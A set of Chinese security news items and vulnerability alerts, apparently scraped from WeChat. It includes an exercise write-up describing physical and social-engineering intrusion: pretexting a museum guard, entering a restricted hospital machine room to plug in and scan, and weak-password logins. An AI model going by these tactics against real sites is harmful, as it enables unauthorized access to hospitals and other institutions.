![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKub5zKpgA0HmT6klBJg9IugI5tZcaxhZn1icWvbgupXzkwybR5pCzxge4SKxSM5z4s9kwOmvuI3cIkQ/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
图片
![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuY813zmiaXibeTuHFXd8WtJAOHgjJxnq1ibibJgVUx3LwCjZj62vygx8w6rxia1icmIWiax2YlP6S6LmlmlQ/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuY813zmiaXibeTuHFXd8WtJAOApVm8H605qOibxia5DqPHfbWD6lmcweDjGv4DLl45waD068ugw2Iv2vg/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuY813zmiaXibeTuHFXd8WtJAOwldaSATYOh1WQpk1qz15rLxehOAn4aK7tdbSyNEuHDZpIISCtl6Q8w/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKub5zKpgA0HmT6klBJg9IugIstia27YLJFBtC5icJO6gHLLgzRDqib6upI3BsVFfLL02w6Q8jIRRp0NJA/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuYrUoo5XZpxN9Inq87ic71D6JWUFIwPbP7Au1PYLXTplb3bbFZFlaYDtXXTqPdzOO6iaFz8F7r8WUPw/640?wx_fmt=png&from=appmsg "")

View File

@ -0,0 +1,212 @@
# 微软2024年11月份于周二补丁日针对90漏洞发布安全补丁
何威风 河南等级保护测评 2024-11-15 16:00
微软周二透露,影响 Windows NT LAN 管理器 ( 
NTLM
 ) 和任务计划程序的两个安全漏洞已被广泛利用。
- **52 个远程代码执行 (RCE) 漏洞**
:这些漏洞允许攻击者在易受攻击的系统上远程执行任意代码。
- **26 特权提升 (EoP) 漏洞**
:这些漏洞使攻击者能够获得比授权更高级别的访问权限。
- **4 拒绝服务 (DoS) 漏洞**
:这些漏洞可以通过使系统超载来破坏服务。
- **3 欺骗漏洞**
- **2 个安全功能绕过 (SFB) 漏洞**
- **1 信息泄露漏洞**
这些安全漏洞是这家科技巨头在 2024 年 11 月补丁星期二更新中解决的
90 个安全漏洞
之一。在这 90 个漏洞中,有 4 个被评为“严重”85 个被评为“重要”1 个被评为“中等”。修补的漏洞中有 52 个是远程代码执行漏洞。
这些修复是微软自 2024 年 10 月补丁星期二更新发布以来在其基于 Chromium 的 Edge 浏览器中解决的
31 个漏洞
的补充。以下是被列为积极利用的两个漏洞 -
- CVE-2024-43451
CVSS 评分6.5- Windows NTLM 哈希泄露欺骗漏洞
- CVE-2024-49039
CVSS 评分8.8- Windows 任务计划程序特权提升漏洞
微软在 CVE-2024-43451 的公告中表示:“此漏洞会将用户的 NTLMv2 哈希泄露给攻击者,攻击者可利用此哈希进行用户身份验证”,并感谢 ClearSky 研究员 Israel Yeshurun 发现并报告了此漏洞。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/rTibWNx9ARWlr2gsy0GXlIR3oaTAYLNlTyOw66kxwlVX5k7h17WI5mmgR2IDYPaVXyOlGfSexAgTC4MAoIGzCYA/640?wx_fmt=png&from=appmsg "")
值得注意的是CVE-2024-43451 是继
CVE-2024-21410
2 月修补)和
CVE-2024-38021
7 月修补)之后的第三个漏洞,可用于泄露用户的 NTLMv2 哈希,并且仅在今年就被广泛利用。
Tenable 高级研究工程师 Satnam Narang 在一份声明中表示:“攻击者继续坚持发现和利用可以泄露 NTLMv2 哈希的零日漏洞,因为它们可用于对系统进行身份验证,并可能在网络内横向移动以访问其他系统。”
另一方面CVE-2024-49039 可能允许攻击者执行原本仅限于特权帐户的 RPC 功能。但是,微软指出,成功利用该漏洞需要经过身份验证的攻击者在目标系统上运行特制应用程序,以首先将其权限提升到中等完整性级别。
谷歌威胁分析小组 (TAG) 的 Vlad Stolyarov 和 Bahare Sabouri 以及一位匿名研究人员因报告该漏洞而受到认可。这提出了一种可能性,即零日漏洞利用与某些与民族国家结盟的团体或高级持续威胁 (APT) 行为者有关。
目前尚不清楚这些缺陷是如何在野外被利用的,也不清楚这些攻击有多广泛,但这一发展促使美国网络安全和基础设施安全局 (CISA) 将它们
添加
到已知被利用漏洞 ( 
KEV
 ) 目录中。
其中一个公开披露但尚未被利用的零日漏洞是
CVE-2024-49019
CVSS 评分7.8),这是 Active Directory 证书服务中的一个权限提升漏洞,可利用该漏洞获取域管理员权限。该漏洞被称为 EKUwu
上个月由 TrustedSec
记录了其详细信息。
另一个值得注意的漏洞是
CVE-2024-43498
CVSS 评分9.8),这是 .NET 和 Visual Studio 中的一个严重远程代码执行错误,远程未经身份验证的攻击者可以通过向易受攻击的 .NET Web 应用程序发送特制的请求或通过将特制的文件加载到易受攻击的桌面应用程序中来利用该错误。
此更新还修复了影响 Windows Kerberos 的严重加密协议缺陷(
CVE-2024-43639
CVSS 评分9.8),该缺陷可能被未经身份验证的攻击者滥用来执行远程代码。
本月发布中评分最高的漏洞是 Azure CycleCloud 中的远程代码执行缺陷(
CVE-2024-43602
CVSS 评分9.9),该缺陷允许具有基本用户权限的攻击者获得 root 级特权。
Narang 表示:“利用该漏洞非常简单,只需向易受攻击的 AzureCloud CycleCloud 集群发送请求即可修改其配置。随着组织继续转向利用云资源,攻击面也随之扩大。”
最后,雷德蒙德解决的一个非微软发布的 CVE 是 OpenSSL 中的远程代码执行漏洞(
CVE-2024-5535
CVSS 评分9.1)。它
最初
由 OpenSSL 维护人员于 2024 年 6 月修补。
微软表示:“利用此漏洞需要攻击者通过电子邮件向受害者发送恶意链接,或者说服用户点击该链接,通常是通过电子邮件或即时通讯消息进行诱惑。”
“在最糟糕的电子邮件攻击情况下,攻击者可以向用户发送特制的电子邮件,而无需受害者打开、阅读或点击链接。这可能导致攻击者在受害者的机器上执行远程代码。”
与 11 月的安全更新同时,微软还宣布采用通用安全公告框架 (CSAF),这是一种以机器可读形式披露漏洞的 OASIS 标准,用于所有 CVE以加快响应和补救工作。
该公司表示
“CSAF 文件更多是供计算机使用,而不是供人类使用,因此我们将 CSAF 文件添加到我们现有的 CVE 数据渠道中,而不是替代
。这是继续提高我们供应链透明度的开始,我们将继续提高整个供应链中漏洞的透明度,包括我们产品中嵌入的开源软件。”
## 2024 年 11 月修复的其他漏洞
- Citrix 修补
虚拟应用程序和桌面 RCE 漏洞
- SAP 安全更新
:高危漏洞补丁
- 爱普生设备漏洞
可让攻击者创建恶意管理员账户
- Palo Alto Networks 警告
PAN-OS 存在严重远程代码执行漏洞
- 思科工业无线
软件漏洞使攻击者能够以 root 用户身份运行命令
- HPE Aruba 接入点中的
多个漏洞
使攻击者能够执行远程代码
- Azure 
API 管理漏洞
使攻击者可以完全控制 APIM 服务
- Chrome 安全更新
:修复多个高严重性漏洞
- Rockwell ThinManager 漏洞
使系统面临 DoS 攻击
- Android 零日
漏洞遭攻击利用,立即修补!
- QuRouter 中的关键
QNAP 零日
漏洞已修补,立即更新!
- PfSense 存储型 XSS 漏洞
可导致 RCE 攻击PoC 已发布
- Okta Verify Agent
 Windows 漏洞使攻击者能够窃取用户密码
- Opera 浏览器零日
漏洞可导致恶意扩展程序接管浏览器
- 严重的
qBittorrent RCE 漏洞
使攻击者能够注入恶意脚本
- 海康威视网络摄像机
漏洞使攻击者能够拦截动态 DNS 凭证
**微软补丁日系列回顾**
[微软2024年10月份于周二补丁日针对118个漏洞发布安全补丁两个被广泛利用](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111569&idx=2&sn=86988cdfb7ee76b055ac801063254b9a&chksm=8bbb28e8bccca1fe8c5da4a00077c0f0231f013412d294a74b6eff9f893ff19c9b70b526b0f3&scene=21#wechat_redirect)
****
[微软2024年9月份于周二补丁日针对79个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110380&idx=1&sn=49ef976b3590b37b5503277d0b199439&chksm=8bbcd415bccb5d03daeff63e8c42230bddac315195226141d0980c9bcba0e5bf90c5b3f5c30e&scene=21#wechat_redirect)
[微软2024年8月份于周二补丁日针对90个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652109338&idx=1&sn=52b533c2ef821e718bf342edf1bfb4fe&chksm=8bbcd023bccb59358aa99905ac73070be24edc627199c264223f2f53acaac6bf912cc5185d44&scene=21#wechat_redirect)
[微软2024年7月份于周二补丁日针对143个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652108626&idx=1&sn=3dff254352fdd8f31b082b3d4bd9078e&chksm=8bbcdd6bbccb547d2889e83cd7aec66a8050b6ac8a92c68156207cb31fd2378dfd234968d7f1&scene=21#wechat_redirect)
****
[微软2024年6月份于周二补丁日针对51个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652107585&idx=2&sn=d699cb1b939a877d8d758e997a710bb0&chksm=8bbcd978bccb506e6c5ad3b12157a949dc7f484173096e0833c14505df9e8d5fd94ce8ba415b&scene=21#wechat_redirect)
****
微软2024年5月份于周二补丁日针对61个漏洞发布安全补丁****
[微软2024年4月份于周二补丁日针对149个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652106650&idx=1&sn=f4d9fb98776cb0c3ac1a3b74621434d2&chksm=8bbcc5a3bccb4cb5fee54a39582c2911786c2cd04c3cb83b29796c2169ba80dc616684c3e987&scene=21#wechat_redirect)
[微软2024年3月份于周二补丁日针对61个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652105630&idx=3&sn=564d21f3b78f3a83ecb663a47d21e6df&chksm=8bbcc1a7bccb48b14bd0705ce92b9b76b2cac214890316c15ef7d96421f51442b3c58f0f4785&scene=21#wechat_redirect)
****
[微软2024年2月份于周二补丁日针对73个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652105051&idx=2&sn=08d24a4e565cf1983a9a170ac32322f4&chksm=8bbcc362bccb4a7495f36fd05f0e3f3d259aa81ef7ef0938a84e1b1404098215c560adef4fcf&scene=21#wechat_redirect)
[微软2024年1月份于周二补丁日针对48个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652104077&idx=1&sn=00e775d8b18878c64a541a974f9f6900&chksm=8bbccfb4bccb46a228cb8c4b2a9b6293c1e931cc5d99962b5411431f59eb98b418d8427ba67e&scene=21#wechat_redirect)
[微软2023年1月份于周二补丁日针对98个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652097971&idx=1&sn=8d6aca53093c99fb7eecc5f6ec61fa32&chksm=8bbce78abccb6e9cf69522278424d43c4cbc3b67e27d70c7612bbd456a92368f829493a70b5e&scene=21#wechat_redirect)
[微软2023年2月份于周二补丁日针对75个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652098496&idx=2&sn=f5d0880366dcb15ad2142bbd5f7caacb&chksm=8bbce5f9bccb6cefc1d69cc3327f45c25b1cc9a508be2595dda94f34730a1ea7285cca5dc50b&scene=21#wechat_redirect)
[微软2023年3月份于周二补丁日针对80个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652098832&idx=3&sn=ed178ef0b84ef588fe19a1b4994f0de8&chksm=8bbcfb29bccb723f105e1b714af495ad31dcc62d972b68cd9b76b3109392825708dfc6e5c928&scene=21#wechat_redirect)
[微软2023年4月份于周二补丁日针对97个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652099128&idx=1&sn=d16300692063a5dec9b42f7ad5bfc022&chksm=8bbcf801bccb7117fc6347c81930bc477b487ef12656a1c793d7ef999d4021c3e23713a94648&scene=21#wechat_redirect)
[微软2023年5月份于周二补丁日针对38个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652099961&idx=2&sn=bb8793c795c5fa0cf72d35d08afdb918&chksm=8bbcff40bccb76568d95daae1bdbfdc90a7efd40327d56691348132598bd33842356cd4d15e6&scene=21#wechat_redirect)
[微软2023年6月份于周二补丁日针对69个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652100192&idx=4&sn=a666f04b85155b3ec205561158c6d513&chksm=8bbcfc59bccb754fb6f9903a4fd7ff4d53561a13f0aa453701d10f1d4dd823a0a7e55c0d7741&scene=21#wechat_redirect)
[微软2023年7月份于周二补丁日针对132个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652100588&idx=1&sn=0eaf525c11c81aed0cc13f37b7cb4bb4&chksm=8bbcfdd5bccb74c34c4e523677f9bc40028c41c5ec8e9d0b210046917f9752f97755e0264be5&scene=21#wechat_redirect)
[微软2023年8月份于周二补丁日针对74个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652101058&idx=2&sn=b0b277ca5ccb12ce8b7674a7ea6d5e4e&chksm=8bbcf3fbbccb7aed14ee5eba02cf8d02a3d9bdc7f2aa1ae48f187874cc2b2399c1b691117177&scene=21#wechat_redirect)
[微软2023年9月份于周二补丁日针对59个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652101836&idx=3&sn=6abb19439dbcf1a6df86f4384f439bda&chksm=8bbcf6f5bccb7fe3c333fe22a18b8c23bc8774694261ecd2b02ea86d6ba211521b4af401cb09&scene=21#wechat_redirect)
[微软2023年10份于周二补丁日针对103个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652102158&idx=2&sn=8735223f48053ae4cfc90860b7acf092&chksm=8bbcf437bccb7d21a82d4126d25c12cd349bc03b05cbbaa5f06094863947b6be363d44bb9b20&scene=21#wechat_redirect)
[微软2023年11份于周二补丁日针对63个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652102933&idx=3&sn=7865e3470f1e380efd750e43600e8e5f&chksm=8bbccb2cbccb423ae5eb1be2ae4858c780df7d50f2173bf5dccdab296ddaef715e05cda7fb63&scene=21#wechat_redirect)
[微软2023年12份于周二补丁日针对33个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652103585&idx=2&sn=8bab2889a8055a138993c4576ed6298f&chksm=8bbcc998bccb408e82abc8b36c6443c34f8ad7f85e88efef4490c82865f6791c3ec86b9dd876&scene=21#wechat_redirect)

View File

@ -0,0 +1,93 @@
# 打补丁要快0Day漏洞正在被黑客广泛利用
老布 FreeBuf 2024-11-16 02:02
![](https://mmbiz.qpic.cn/mmbiz_gif/oQ6bDiaGhdyoFWEgZIHic7sqnootFEuOic7RlQNGhKY6d2ZESG3WpiaTMRlD0z4xO6mQrTZjkWHCkMpO2QtCfUJH6g/640?wx_fmt=gif&from=appmsg&wxfrom=5&wx_lazy=1&tp=webp "")
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38kicxmSKeQw5hH5XX7P9Sn57I9BBPXUxN2OTqkz6aYOPu6aKlibzPGHqRejhibwypanMenmRkrlDyIw/640?wx_fmt=jpeg&from=appmsg "")
近日美国、英国、加拿大、澳大利亚和新西兰五眼联盟网络安全机构联合发布了报告公布了2023年最常被利用的漏洞清单。其中零日漏洞已经成为黑客最常利用的漏洞类型。
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38kicxmSKeQw5hH5XX7P9Sn5gBHud6gWfQnW07uXdl6PtawdDlU5rM1u60QU3yAG8vfnWT1EXsq8UQ/640?wx_fmt=jpeg&from=appmsg "")
该警告强调攻击者们正越来越多地利用零日漏洞入侵企业与2022年相比零日漏洞利用的有所增长。
与前几年旧的、未修补的漏洞占据列表的主导地位不同的是在2023年漏洞利用趋势中零日漏洞利用的激增这反映出攻击者漏洞攻击策略的变化
**在漏洞公布后的几天内快速利用。**
过去,安全漏洞被利用或许需要几个月时间,但现在,发现与利用之间的时间间隔已经减少到了几天甚至是几个小时。
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38kicxmSKeQw5hH5XX7P9Sn5tDbaKVQQIXcCFbQXT171c9g1aPzuU2xapM8YkPc6j7WMRg31OQBRNg/640?wx_fmt=jpeg&from=appmsg "")
报告另一个数据也指出,大量漏洞在披露后的两年内被积极利用,突显了及时补丁管理的必要性。
在发布的2023年漏洞利用榜TOP15中CVE-2023-3519漏洞位居榜首该漏洞影响NetScaler ADC和NetScaler Gateway的多个版本包括13.0、13.1、13.1-FIPS、12.1-FIPS和12.1-NDcPP等在修补期间被广泛利用导致了大量的设备被攻陷。
CVE-2023-20198是另外一个排在前列的漏洞影响Cisco IOS XE系统中的Web管理用户界面允许黑客获得设备中最高等级的Level 15权限从而可以完全控制相关设备执行任意命令。此外Log4Shell漏洞CVE-2021-44228影响Apache的Log4j库由于其广泛应用于各种软件应用中即使在最初披露两年后仍然被利用。
Tenable的高级研究员Satnam Narang表示“入选2023年最常被利用漏洞榜的漏洞有一个共同点即它们都暴露于互联网服务或系统中包括从VPN解决方案到远程管理界面。这些面向互联网的系统中往往会使用包含已知漏洞的软件从而导致被黑客成规模利用。
另外在漏洞利用榜中最古老的一个漏洞是七年前公布的CVE-2017-6742即便是到了2023年仍然有很多的黑客在利用该漏洞对企业发起攻击。而根据一些情报信息仍有大约24,000个Cisco IOS和IOS XE系统可能面临CVE-2023-20198漏洞的攻击。
FreeBuf粉丝交流群招新啦
在这里,拓宽网安边界
甲方安全建设干货;
乙方最新技术理念;
全球最新的网络安全资讯;
群内不定期开启各种抽奖活动;
FreeBuf盲盒、大象公仔......
扫码添加小蜜蜂微信回复「加群」,申请加入群聊
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR3ich6ibqlfxbwaJlDyErKpzvETedBHPS9tGHfSKMCEZcuGq1U1mylY7pCEvJD9w60pWp7NzDjmM2BlQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&retryload=2&tp=webp "")
![](https://mmbiz.qpic.cn/mmbiz_png/oQ6bDiaGhdyodyXHMOVT6w8DobNKYuiaE7OzFMbpar0icHmzxjMvI2ACxFql4Wbu2CfOZeadq1WicJbib6FqTyxEx6Q/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icEEJemUSFlfufMicpZeRJZJ61icYlLmBLDpdYEZ7nIzpGovpHjtxITB6ibiaC3R5hoibVkQsVLQfdK57w/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&retryload=2&tp=webp "")
> https://www.bleepingcomputer.com/news/security/leaked-info-of-122-million-linked-to-b2b-data-aggregator-breach/
>
>
>
>
>
>
>
>
>
>
>
>
>
>
![](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icEEJemUSFlfufMicpZeRJZJ7JfyOicficFrgrD4BHnIMtgCpBbsSUBsQ0N7pHC7YpU8BrZWWwMMghoQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651302087&idx=1&sn=29d91904d6471c4b09f4e574ba18a9b2&chksm=bd1c3a4c8a6bb35aa4ddffc0f3e2e6dad475257be18f96f5150c4e948b492f32b1911a6ea435&token=21436342&lang=zh_CN&scene=21#wechat_redirect)
[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651302006&idx=1&sn=18f06c456804659378cf23a5c474e775&scene=21#wechat_redirect)
[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651253272&idx=1&sn=82468d927062b7427e3ca8a912cb2dc7&scene=21#wechat_redirect)
![](https://mmbiz.qpic.cn/mmbiz_gif/qq5rfBadR3icF8RMnJbsqatMibR6OicVrUDaz0fyxNtBDpPlLfibJZILzHQcwaKkb4ia57xAShIJfQ54HjOG1oPXBew/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&tp=webp "")

View File

@ -0,0 +1,60 @@
# 攻防演练 | 一次近源渗透
原创 zkaq -Alan 掌控安全EDU 2024-11-16 04:03
扫码领资料
获网安教程
![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcrpvQG1VKMy1AQ1oVvUSeZYhLRYCeiaa3KSFkibg5xRjLlkwfIe7loMVfGuINInDQTVa4BibicW0iaTsKw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![](https://mmbiz.qpic.cn/mmbiz_png/b96CibCt70iaaJcib7FH02wTKvoHALAMw4fchVnBLMw4kTQ7B9oUy0RGfiacu34QEZgDpfia0sVmWrHcDZCV1Na5wDQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
# 本文由掌控安全学院 -   zkaq -Alan 投稿
**来****Track安全社区投稿~**
**千元稿费!还有保底奖励~https://bbs.zkaq.cn**
## 1.XX博物馆
因为这次比赛有近源攻击刚好资产上面有这个博物馆因为信息太少没被打穿就打车去近源攻击碰碰运气第一天过去的时候刚好周末博物馆没开门就管门卫说我们是游客能不能蹭个wifi发个文件。门卫大叔还挺好连上wifi后坐在他对面一通乱扫发现除了网关什么都没有再抬头看门卫已经有点怀疑了为了第二天开馆的时候能顺利过来就说了声栓q就走了第二天过来的时候要过个安全检查说不让带电脑进去解释半天说过来工作的抽时间出来玩待会还要工作才让进去。进去之后惊喜来了大堂wifi弱密码连上之后看了一眼自动获取的ip排到了一百多我就知道有东西然后就是把电脑放在一个角落
让他慢慢扫,自己在那边闲逛,这家博物馆还挺不错,给兄弟们上图片。
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/BwqHlJ29vcogThujOx2cAicLiahUClttzWqlZKrBVR2T5GFX2Eeqia7F5vQVCQOfibCX6xibOSt2I8X2cIsiawCibJrAA/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/BwqHlJ29vcogThujOx2cAicLiahUClttzWEpwHgBwLYf3vxgSS9dDLVpjKicUibog9TjYiaJYnzBQ7CQqCOuJJUoibjg/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/BwqHlJ29vcogThujOx2cAicLiahUClttzWmIc2uUicUH389o3Izv9payqSicjCub8SpZfE6Ia8IMlf23vBCWTOH2ZQ/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcogThujOx2cAicLiahUClttzWPB0ltorVp9HIiaGQx4ZiaibWiah58ZZDduJmfoJyUIOHP9C0znWIgd0nGQ/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
像这种物联网的客户端有好多,盲猜应该是一些投影仪之类的设备吧,基本都是弱口令,还扫到了其他一些设备,时间太久忘记了。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcogThujOx2cAicLiahUClttzW0Ihmc5YObhnicRNNJNWmUm7BRWqVXqEsIhJibRib4WBG0gf7tJrqw1SFw/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
## 2.XX官网
这个就多亏了我的好兄弟给的一个day直接进去任子行的防火墙然后就是搭建vpn进入内网扫内网用弱口令拿到一台交换机和另外几个设备。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcogThujOx2cAicLiahUClttzWdrSc60icb1Lea8QVKXHSeiaIP7CxVZF5ZoSwibzpmheBNAeqcicyE9Iocg/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcogThujOx2cAicLiahUClttzWnRuGFowEPt2KibvdVJnOYfge7BWy1gYCfpAicMdDN8yka6bUyjgcxlog/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcogThujOx2cAicLiahUClttzWHS2Q0iaBgd4EUFk5L2VSZbuL7fcDeDwH1bllNknBbSGmcPe3zG5GN9Q/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcogThujOx2cAicLiahUClttzWJbWFeUZpv9GTRCJ7iac4Qu0weyKthb33MM5efUXPibohoB3TMickoVFicA/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
## 3.XX医院
这家医院看了一眼资产没有被打穿就打车过去瞅瞅冬天的医院可谓是满满当当的问前台有wifi吗想连一下打个游戏就直接被拒绝了呵操。然后开始一层一层的找有没有施工队未完成的地方或者露出个什么断的网线我直接免费给你安装一个水晶头终于在住院部的顶层我发现了一个小机房上面虽然写着机房重地非请勿入但是我可是来帮助你们发现薄弱点的进去之后拿出自己随身携带的网线插上路由器开始扫内网这次比上次好两百多的ip扫了快二十分钟就是机房环境不太好没有凳子只能半蹲着又因为网线太短还得凑着电脑搞得我是十分痛苦但是结果还是挺满意因为本人太菜又因为对医院系统不熟悉所以没能全部拿下来只拿下来了一部分设备和系统。打算背着包出去的时候在门上听了半天没什么动静了才出去但是刚出去发现周围一堆人在往这边走刚好遇到我从机房出来后面才发现旁边就是医院的员工宿舍然后他们也不问我也不说话背着包快步走掉了差点被逮到逮到就要请去喝茶了。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcogThujOx2cAicLiahUClttzWV8llt9Uw9kUL4umh52y099QqibIwvcem1cNC0xRckC0hA76RAhfgyeQ/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcogThujOx2cAicLiahUClttzWMK4vWh0lvicZCibhI0AgrSPlnIyZ51jUePkrITBpdFEH5SKKSBuX2eng/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcogThujOx2cAicLiahUClttzWhkf1z3x74Iib9qLzKm3VvvD83b66yQna5oiaMMn506ibfficvVgtWgt1wQ/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
## 4.XX中学
这个学校因为其中一个网站关闭,所以就口述一下渗透思路,当时发现这个学校有两个管理平台,一个是智慧校园,一个是校园平台,两个平台都需要进行登录,试了下常用漏洞都攻击不进去的时候,发现忘记密码地方显示的是,请联系某某老师,然后就是手机号,利用这个手机号,弱口令,发现这个平台进不去,就换了一个平台,还是这个手机号,弱口令,没想到就进去了,只恨这个学校是个中学老师太少,分数没加多少。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcogThujOx2cAicLiahUClttzWAdpI7xmjCqp8QekdiaJ9AO8nBCTI2Wgytt8Qu1Yib9DL8Unf7EVPtTiaA/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
```
```

View File

@ -0,0 +1,46 @@
# 漏洞预警 | Apache ZooKeeper身份验证绕过漏洞
浅安 浅安安全 2024-11-16 00:01
**0x00 漏洞编号**
- # CVE-2024-51504
**0x01 危险等级**
- 高危
**0x02 漏洞概述**
Apache ZooKeeper是由集群使用的一种服务用于在自身之间协调并通过稳健的同步技术维护共享数据。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/7stTqD182SWJkBhlicYtEdFMCXic0K33Fvia5DAYx9VtxSA42pkdl6wu4QQCvF1p0uSlCP6v7LL9tvkYfjZh5BoRA/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
**0x03 漏洞详情**
###
###
**CVE-2024-51504**
**漏洞类型:**
身份验证绕过
**影响:**
获取
敏感信息
**简述:**
Apache ZooKeeper存在身份验证绕过漏洞当ZooKeeper Admin Server使用基于IP的身份验证时由于默认配置下使用了可被轻易伪造的HTTP请求头来检测客户端IP地址攻击者可通过伪造请求头中的IP地址来绕过身份验证进而实现未授权访问管理服务器功能并任意执行管理服务器命令从而可能导致信息泄露或服务可用性问题。
###
**0x04 影响版本**
- 3.9.0 <= Apache ZooKeeper < 3.9.3
**0x05****POC状态**
- 未公开
**0x06****修复建议**
******目前官方已发布漏洞修复版本,建议用户升级到安全版本**********
https://zookeeper.apache.org/

View File

@ -0,0 +1,49 @@
# 漏洞预警 | HPE Aruba Networking Access Points命令注入漏洞
浅安 浅安安全 2024-11-16 00:01
**0x00 漏洞编号**
- # CVE-2024-42509
**0x01 危险等级**
- 高危
**0x02 漏洞概述**
